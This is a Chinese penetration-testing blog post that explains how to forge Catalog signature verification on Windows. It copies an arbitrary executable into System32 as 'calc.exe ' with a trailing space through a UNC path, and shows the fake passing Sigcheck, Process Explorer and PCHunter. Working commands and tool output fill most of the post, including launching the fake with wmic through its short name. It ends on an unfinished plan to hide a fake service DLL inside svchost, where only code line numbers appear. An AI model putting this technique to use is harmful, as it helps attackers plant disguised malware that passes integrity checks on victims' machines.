<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/my-apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico">
  <link rel="mask-icon" href="/images/my-logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.css">
  <script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.js"></script>

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mysock.net","root":"/","images":"/images","scheme":"Gemini","version":"8.2.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
  </script>
<meta name="description" content="概述Windows默认要求，文件名中不能以空格开头或结尾，如果有空格，系统会自动移除。但是如果使用UNC文件名，空格会被保留。部分校验工具，没有处理好这种特殊文件名，导致校验文件时，拼接了错误的文件路径，达到欺骗校验的效果。 测试伪造效果">
<meta property="og:type" content="article">
<meta property="og:title" content="利用文件名欺骗伪造Catalog签名">
<meta property="og:url" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/">
<meta property="og:site_name" content="阿远的小窝">
<meta property="og:description" content="概述Windows默认要求，文件名中不能以空格开头或结尾，如果有空格，系统会自动移除。但是如果使用UNC文件名，空格会被保留。部分校验工具，没有处理好这种特殊文件名，导致校验文件时，拼接了错误的文件路径，达到欺骗校验的效果。 测试伪造效果">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/calc属性常规.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/sigcheck-i.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/wmic_短文件名.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/wmic_unc.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/8.3_normal.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/procexp_calc.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_fakecalc.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/calc属性详细信息.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_module.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/srv_dll_running.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/px_srvdll_verify.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_srvdll_verify.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_srvdll_no_verify.png">
<meta property="og:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/error_path.png">
<meta property="article:published_time" content="2023-08-05T03:29:56.000Z">
<meta property="article:modified_time" content="2023-08-05T03:40:22.358Z">
<meta property="article:author" content="schip">
<meta property="article:tag" content="签名">
<meta property="article:tag" content="服务">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/calc属性常规.png">


<link rel="canonical" href="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<title>利用文件名欺骗伪造Catalog签名 | 阿远的小窝</title>
  




  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">阿远的小窝</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0"><span class="nav-text">概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95%E4%BC%AA%E9%80%A0%E6%95%88%E6%9E%9C"><span class="nav-text">测试伪造效果</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%9F%E6%88%90%E4%BC%AA%E9%80%A0%E6%96%87%E4%BB%B6"><span class="nav-text">生成伪造文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E4%BC%AA%E9%80%A0%E6%96%87%E4%BB%B6"><span class="nav-text">使用伪造文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C%E4%BC%AA%E9%80%A0%E6%96%87%E4%BB%B6%E5%B9%B6%E9%AA%8C%E8%AF%81"><span class="nav-text">运行伪造文件并验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A0%E9%99%A4%E4%BC%AA%E9%80%A0%E6%96%87%E4%BB%B6"><span class="nav-text">删除伪造文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%83%A8%E5%88%86%E6%97%A0%E6%B3%95%E4%BC%AA%E9%80%A0%E5%92%8C%E6%AC%BA%E9%AA%97%E7%9A%84%E5%8A%9F%E8%83%BD"><span class="nav-text">部分无法伪造和欺骗的功能</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%A9%E5%B1%95%E7%94%A8%E6%B3%95"><span class="nav-text">扩展用法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86%E6%B5%85%E6%9E%90"><span class="nav-text">原理浅析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%99%84%E5%BD%95"><span class="nav-text">附录</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="schip"
      src="/images/my-avatar.png">
  <p class="site-author-name" itemprop="name">schip</p>
  <div class="site-description" itemprop="description">宁静致远 厚德载物 天道酬勤</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mysock.net/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/my-avatar.png">
      <meta itemprop="name" content="schip">
      <meta itemprop="description" content="宁静致远 厚德载物 天道酬勤">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="阿远的小窝">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          利用文件名欺骗伪造Catalog签名
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-08-05 11:29:56 / 修改时间：11:40:22" itemprop="dateCreated datePublished" datetime="2023-08-05T11:29:56+08:00">2023-08-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><p>Windows默认要求，文件名中不能以空格开头或结尾，如果有空格，系统会自动移除。但是如果使用UNC文件名，空格会被保留。部分校验工具，没有处理好这种特殊文件名，导致校验文件时，拼接了错误的文件路径，达到欺骗校验的效果。</p>
<h2 id="测试伪造效果"><a href="#测试伪造效果" class="headerlink" title="测试伪造效果"></a>测试伪造效果</h2><h3 id="生成伪造文件"><a href="#生成伪造文件" class="headerlink" title="生成伪造文件"></a>生成伪造文件</h3><p>将一个用于计算Hash的exe文件，伪装为系统的计算器calc.exe：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">type</span> Hash.exe &gt; <span class="string">&quot;\\?\C:\Windows\System32\calc.exe &quot;</span></span><br></pre></td></tr></table></figure>
<p>查看文件属性-常规，两者显示基本一致，但在兼容性、文件图标、文件类型会漏出马脚：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/calc属性常规.png" alt="calc属性常规.png"></p>
<h3 id="使用伪造文件"><a href="#使用伪造文件" class="headerlink" title="使用伪造文件"></a>使用伪造文件</h3><p>Long UNC文件的文件名一般无法直接使用，需要转为短文件名，命令如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">C:\WINDOWS\system32&gt;dir /x calc*</span><br><span class="line"> 驱动器 C 中的卷是 Windows</span><br><span class="line"> 卷的序列号是 4843-3834</span><br><span class="line"></span><br><span class="line"> C:\WINDOWS\system32 的目录</span><br><span class="line"></span><br><span class="line">2019/12/07  17:09            27,648              calc.exe</span><br><span class="line">2023/04/03  16:48            29,184 CALC~1.EXE   calc.exe</span><br><span class="line">               2 个文件         56,832 字节</span><br><span class="line">               0 个目录 603,596,009,472 可用字节</span><br></pre></td></tr></table></figure>
<p>使用sigcheck64.exe校验伪造的calc.exe文件，无论使用Long UNC文件名还是短文件名，均能通过校验：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">C:\1\Sigcheck&gt;sigcheck64.exe <span class="string">&quot;\\?\C:\Windows\System32\calc.exe &quot;</span></span><br><span class="line"></span><br><span class="line">Sigcheck v2.90 - File version and signature viewer</span><br><span class="line">Copyright (C) 2004-2022 Mark Russinovich</span><br><span class="line">Sysinternals - www.sysinternals.com</span><br><span class="line"></span><br><span class="line">\\?\c:\windows\system32\calc.exe:</span><br><span class="line">        Verified:       Signed</span><br><span class="line">        Signing date:   3:35 2010/11/21</span><br><span class="line">        Publisher:      Microsoft Windows</span><br><span class="line">        Company:        Microsoft Corporation</span><br><span class="line">        Description:    Windows Calculator</span><br><span class="line">        Product:        Microsoft?Windows?Operating System</span><br><span class="line">        Prod version:   6.1.7600.16385</span><br><span class="line">        File version:   6.1.7600.16385 (win7_rtm.090713-1255)</span><br><span class="line">        MachineType:    64-bit</span><br><span class="line"></span><br><span class="line">C:\1\Sigcheck&gt;sigcheck64.exe <span class="string">&quot;C:\Windows\System32\CALC~1.exe&quot;</span></span><br><span class="line"></span><br><span class="line">Sigcheck v2.90 - File version and signature viewer</span><br><span class="line">Copyright (C) 2004-2022 Mark Russinovich</span><br><span class="line">Sysinternals - www.sysinternals.com</span><br><span class="line"></span><br><span class="line">c:\windows\system32\calc.exe :</span><br><span class="line">        Verified:       Signed</span><br><span class="line">        Signing date:   3:35 2010/11/21</span><br><span class="line">        Publisher:      Microsoft Windows</span><br><span class="line">        Company:        Microsoft Corporation</span><br><span class="line">        Description:    Windows Calculator</span><br><span class="line">        Product:        Microsoft?Windows?Operating System</span><br><span class="line">        Prod version:   6.1.7600.16385</span><br><span class="line">        File version:   6.1.7600.16385 (win7_rtm.090713-1255)</span><br><span class="line">        MachineType:    64-bit</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>sigcheck64.exe添加<code>-i</code>参数，用于显示完整的证书链，对比原始的计算器calc.exe证书信息，仍然完全一致：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/sigcheck-i.png" alt="sigcheck-i.png"></p>
<h3 id="运行伪造文件并验证"><a href="#运行伪造文件并验证" class="headerlink" title="运行伪造文件并验证"></a>运行伪造文件并验证</h3><p>使用<code>wmic</code>结合短文件名可正常启动伪造文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">C:\1&gt;wmic process call create C:\Windows\System32\CALC~1.exe</span><br><span class="line">Executing (Win32_Process)-&gt;Create()</span><br><span class="line">Method execution successful.</span><br><span class="line">Out Parameters:</span><br><span class="line">instance of __PARAMETERS</span><br><span class="line">&#123;</span><br><span class="line">        ProcessId = 1916;</span><br><span class="line">        ReturnValue = 0;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/wmic_短文件名.png" alt="wmic_短文件名.png"></p>
<p>如果<code>wmic</code>使用Long UNC文件名，会启动正常的系统计算器：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/wmic_unc.png" alt="wmic_unc.png"></p>
<p>直接使用Long UNC文件名无效：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\1&gt;<span class="string">&quot;\\?\C:\Windows\System32\calc.exe &quot;</span></span><br><span class="line">系统找不到指定的路径。</span><br></pre></td></tr></table></figure>
<p>直接使用短文件名，会弹出正常计算器：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\1&gt;C:\Windows\System32\CALC~1.EXE</span><br></pre></td></tr></table></figure>
<p><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/8.3_normal.png" alt="8.3_normal.png"></p>
<p>使用ProcessExplorer验证运行的伪造文件，进程描述、厂商名称等无法欺骗，但是文件仍然通过了验证：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/procexp_calc.png" alt="procexp_calc.png"></p>
<p>PCHunter与之类似，显示出了伪造文件的原始信息，但仍然通过了数字签名验证：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_fakecalc.png" alt="pchunter_fakecalc.png"></p>
<h3 id="删除伪造文件"><a href="#删除伪造文件" class="headerlink" title="删除伪造文件"></a>删除伪造文件</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">C:\WINDOWS\system32&gt;del c:\Windows\System32\CALC~1.exe</span><br><span class="line">或者</span><br><span class="line">C:\WINDOWS\system32&gt;del <span class="string">&quot;\\?\C:\Windows\System32\calc.exe &quot;</span></span><br></pre></td></tr></table></figure>
<h3 id="部分无法伪造和欺骗的功能"><a href="#部分无法伪造和欺骗的功能" class="headerlink" title="部分无法伪造和欺骗的功能"></a>部分无法伪造和欺骗的功能</h3><p>文件属性-详细信息，可以正常识别伪造文件和正常文件的信息：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/calc属性详细信息.png" alt="calc属性详细信息.png"></p>
<p>PCHunter-模块窗口，校验模块数字签名，无法通过数字签名验证：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_module.png" alt="pchunter_module.png"></p>
<h2 id="扩展用法"><a href="#扩展用法" class="headerlink" title="扩展用法"></a>扩展用法</h2><p>将该方法与伪造系统服务Dll结合使用，由正常的系统进程svchost.exe加载自己的服务Dll，达到更隐蔽的伪装效果。</p>
<p>编写一个伪装为系统服务的Dll文件svchost.dll，以及服务加载器LoadSvchostDll.exe，代码如下：</p>
<p>svchost.dll代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span 